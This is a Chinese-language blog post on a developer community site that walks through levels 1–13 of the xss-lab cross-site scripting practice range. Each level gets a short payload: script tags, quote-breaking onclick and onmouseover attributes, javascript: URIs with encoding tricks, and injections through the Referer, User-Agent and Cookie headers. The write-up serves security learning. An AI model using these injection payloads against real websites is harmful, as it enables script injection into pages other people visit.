前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >xsslab通关记录(一)

xsslab通关记录(一)

作者头像
cultureSun
发布2023-05-18 14:55:22
3400
发布2023-05-18 14:55:22
举报
文章被收录于专栏:cultureSun学安全cultureSun学安全

简介

xsslab是最经典的xss练习靶场。 GitHub地址--https://github.com/rebo-rn/xss-lab 本人使用在线靶场--http://xss.xiejiahe.com/ 换个在线靶场--http://test.ctf8.com/

详解

  1. level-1

http://xss-ctf.xiejiahe.com/level1?name=%3Cscript%3Ealert(1)%3C/script%3E

  1. level-2

"onclick="alert(1)

  1. level-3

' onclick=alert(/xss/)//

  1. level-4

" onclick = "alert(1)""

  1. level-5

"><iframe src=javascript:alert(/xss/)> "><a href=" javascript:alert(/xss/)" 注意这个小线条才是a标签

16817193811476.png
16817193811476.png
  1. level-6

"Onclick="alert(1)

  1. level-7

"Onclick="alert(1)

  1. level-8

javascript:alert(1)

  1. level-9

javascript:%0dhttp://%0dalert(/xss/) %0d是空字符串的URL编码

  1. leve-10

查看源码发现需要两个GET参数,一个是keyword,一个是t_sort。 keyword=test&t_sort="type="text" onclick="alert(/xss/)

  1. level-11

需要先代码审计一下,payload位置在请求头Referer参数 使用burp工具拦截修改请求头后再发送请求 " onmouseover=alert(/xss/) type="text"

2023-04-17214849.png
2023-04-17214849.png
  1. level-12

和十一payload一样,只是位置是请求头User-Agent参数值

  1. level-13

payload的位置在cookie中,burp拦截添加cookie user=" type="text" onmouseover=alert(/xss/) type="text"

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档